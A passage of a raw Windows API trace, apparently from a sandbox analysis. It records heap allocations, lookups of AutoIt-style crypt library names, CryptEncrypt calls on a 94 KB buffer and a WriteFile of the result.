Flags=0x0, Size=0x14) returned 0x1796ec8 [0099.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b18 [0099.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0099.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0099.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0099.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0099.384] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0099.384] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0099.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0099.385] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796d88, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0099.385] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0099.385] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0099.386] CryptGetKeyParam (in: hKey=0x41ac6c0, dwParam=0x7, pbData=0x43e28a0, pdwDataLen=0x144e008, dwFlags=0x0 | out: pbData=0x43e28a0*=0x6610, pdwDataLen=0x144e008*=0x4) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0099.386] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2788 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ee8 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0099.387] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f48 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.388] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0099.388] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0099.388] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.388] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b48 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2b18 | out: hHeap=0x1780000) returned 1 [0099.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0099.389] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0099.389] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0099.390] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0099.390] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.390] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.390] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0099.390] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e538*=0x16f6b, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e538*=0x16f70) returned 1 [0099.391] CharLowerBuffW (in: lpsz="byte[94065]", cchLength=0xb | out: lpsz="byte[94065]") returned 0xb [0099.394] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.394] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0099.394] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43ca9b8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0099.394] CryptEncrypt (in: hKey=0x41ac6c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x49b0f80*, pdwDataLen=0x144e538*=0x16f6b, dwBufLen=0x16f70 | out: pbData=0x49b0f80*, pdwDataLen=0x144e538*=0x16f70) returned 1 [0099.394] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0099.394] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0099.394] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0099.395] WriteFile (in: hFile=0x258, lpBuffer=0x4516010*, nNumberOfBytesToWrite=0x16f70, lpNumberOfBytesWritten=0x144ef3c, lpOverlapped=0x0 | out: lpBuffer=0x4516010*, lpNumberOfBytesWritten=0x144ef3c*=0x16f70, lpOverlapped=0x0) returned 1 [0099.458] TranslateMessage (lpMsg=0x144f084) returned 0 [0099.458] DispatchMessageW (lpMsg=0x144f084) returned 0x0 [0099.458] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0099.458] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0099.458] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0099.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0099.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0099.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0099.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0099.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0099.458] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca388 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1a8 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca280 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca238 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3a0 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ce8 [0099.459] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28a0 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3e8 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0099.459] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0099.459] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0099.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca418 [0099.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0099.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0099.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2b0 [0099.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0099.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0099.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0099.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0099.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0099.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0099.460] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0099.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca208 [0099.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0099.460] PeekMessageW (in: lpMsg=0x144e714, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e714) returned 0 [0099.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0099.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0099.460] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0099.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0099.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0099.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0099.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0099.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0099.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0099.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0099.461] 